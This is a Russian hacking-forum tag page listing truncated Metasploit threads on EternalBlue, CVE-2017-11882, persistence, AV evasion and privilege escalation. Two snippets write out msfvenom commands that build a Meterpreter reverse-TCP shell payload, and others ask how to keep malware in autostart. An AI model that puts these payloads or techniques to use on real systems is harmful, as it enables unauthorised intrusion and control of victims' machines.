metasploit

  1. Rollly

    Статья Установка Ubuntu в связке с Metasploit [TERMUX]

    Доброго времени суток, обитатели Codeby. Думаю не у каждого есть возможность иметь при себе ноутбук с хакерским арсеналом или же NetHunter, но на помощь к нам приходит Termux. Не буду тянуть кота за хвост. Как вы поняли из названия темы сегодня мы установим Ubuntu в связке с Metasploit...
  2. linked3234

    "Адекватный" VPS для тестирования MSF

    Приветствую! Решил сюда написать, т.к. вроде тема соответствует разделу.. В общем я подыскиваю недорогой VPS на debian для тренировки с MSFConsole (что б сессия прилетала, думаю вы поняли).. Не подскажете кто шарит, что и где лучше взять?
  3. Tayrus

    Проблема ms17_010_psexec

    Обновился до 2018.1, решил тестануть ms17_010_psexec, пишет Started reverse TCP handler on 192.168.1.4:4444 192.168.1.2:445 - Target OS: Windows 8.1 Enterprise 9600 [-] 192.168.1.2:445 - Unable to find accessible named pipe! Exploit completed, but no session was created. Не патчена, антивиря...
  4. Marr

    Metasploit Penetration Testing Cookbook

    Добрый день! Если у кого есть скиньте, пожалуйста, ссылку на полный перевод Metasploit Penetration Testing Cookbook Спасибо!
  5. S

    Ошибка metasploit wmap

    Ошибку ниже я сначала словил под Arch. Потом попробовал запустить и под Kali последней версии. Но ничего не поменялось под обеими ОС одна и та же ошибка. msf5 > wmap_targets -t http://site.com [-] Error while running command wmap_targets: PG::InvalidTextRepresentation: ERROR: invalid input...
  6. Tayrus

    Metasploit raw

    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.4 lport=4444 -f raw > sag При открытии \FC\E8\82\00\00\00`\89\E51\C0d\8BP0\8BR\8BR\8Br(\B7J&1\FF\AC<a|, \C1\CF\C7\E2\F2RW\8BR\8BJ<\8BLx\E3H\D1Q\8BY...
  7. FlowLight

    Empire powershell и ngrok ! Кто-нибудь использует эту связку?

    Друзья , прошу помощи ! Не получается схватить агента с целевого пк , который находится за NATом. Слушатель Empire использует http-захват , а это поставило меня в тупик. Привык работать с TCP-ревёрсингом в метасплоит , использую NGROK для проброса портов. А вот в Empire не хватает тямы всё...
  8. BadBlackHat

    Пост эксплуатация скомпроментированных Windows систем. Metasploit Incognito

    Всем посетителям форума, доброго времени дня. Сегодня я решил осветить один из встроенных модулей в metasploit framework, о котором мало кто знает и мало кто пользуется, но на самом деле данный модуль позволяет поднять свои привилегии вплоть до администратора домена или предприятия в зависимости...
  9. FlowLight

    Эксплоиты на С++

    Друзья! Скажите пожалуйста , каким образом можно использовать эксплоиты с данным раширением в Metasploit и в какой среде ,помимо метасплоит , можно их юзать?
  10. F

    Так много exploit'ов

    Всем здравствуйте. Совсем недавно начал углубленно изучать\читать про эксплоиты. Ведь именно они залог удачного взлома! И хотелось бы, так сказать, узнать о них еще больше. Недавно поставил на свою виртуальную машину windows7, и попробовал получить к ней доступ с помощью эксплоита eternalblue...
  11. Sykes

    Не работают эксплойты

    Основа: Кали или Арч Цель: машина на Windows XP, Windows 7, Windows server. Столкнулся с проблемой, что эксплойты не всегда создают ссесию, хотя система девственна и без намека на АВ. Проблема решается отключением брендмаузера, но как его обойти? Раньше таких проблем не испытывал.
  12. Tayrus

    Metasploit Автозагрузка

    Как в метасплоите закрепиться в системе(свой вредонос в автозагрузку занести)? Может модуль есть какой-нибудь?
  13. Tayrus

    Metasploit русский язык

    Когда в метасплоите пытаюсь взаимодействовать с файлами на русском языке, вылетает ошибка, мол нету такого файла, как пофиксить?
  14. Tayrus

    Metasploit ошибка

    У меня шиндовс 8.1, создаю shell такой командой: msfvenom -p windows/meterpreter/reverse_tcp LHOST=ВашАйпи LPORT=4444 -f exe > /root/shell.exe Закидываю на хост, сессия прилетает, такие команды типо cd pwd ifconfig работают, а все остальные нет, не работает даже cat пишет: [-] stdapi_fs_stat...
  15. A

    CVE-2017-11882 MS Word Metasploit

    Добрый день. Один доллар (@OneDollar) показал пример эксплуатации уязвимости через Empire Powershell CVE-2017-11882 или Взлом с помощью безобидного документа Мы рассмотрим альтернативный вариант через Metasploit: Скачаем и перенесём експлоит wget...
  16. Vertigo

    Статья SpookFlare-инструмент генерации файла для обхода AV

    Здравствуйте,Уважаемые Форумчане,Друзья и Дорогие Читатели портала Codeby. Очередной обзор будет посвящён несколько необычному инструменту. Всем,кто связан так,или иначе, с IT-безопасностью,будет полезно знать о его существовании. Особенность SpookFlare на текущий момент заключается в обходе...
  17. N

    лучший гайд по сборке metasploit а так же лучшая прога удаленного доступа после armitage

    ищу внятный мануал по поводу эксплойтов, пэйлоудав и пост эксплуатации, а так же лучшую прогу для кали удаленного доступа после взлома, наподобе дарк комет. объясните пожалуйста поподробнее что в кслючают в семя модули эксплойтов, пейлойдов и пост эксплуацтации. эксплойты я как понял это тоже...
  18. mz111

    Непонятная сессия)

    Всем привет.Может быть кто-нибудь объяснит мне,дохлому ламеру,почему при создании сессии не запускается vncviewer ??) И как нужно определять параметр LPORT ?? Как я понимаю - я за NATом(команда ifconfig и сайты определяющие ip показывают разные адреса). В общем: Эксплойт -...
  19. Ondrik8

    Статья Автомобиль + ELM-327 + Metasploit = PROFIT

    Всем привет! Сегодня поговорим о ВЕСчах который должен иметь каждый уважающий себя мужик. "Права ты можешь не иметь, но автомобиль иметь обязан!" Кстати это про меня)) 5 машин поменял, а Вод. Удостоверение все никак не получу..(( В этой статье я покажу Вам как подружить китайский ELM-327...
  20. Vander

    Статья Eternal Romance Synergy Exploit - Meterpreter - Windows Server

    Приветствую, обитателей и гостей форума! В этой статье, я хочу показать на практике работу, эксплойта ETERNALROMANCE/SYNERGY с улучшенным методом эксплуатации и направленным на системы под управлением Windows Server. Здесь можно прочитать о его происхождении способах приготовления: >...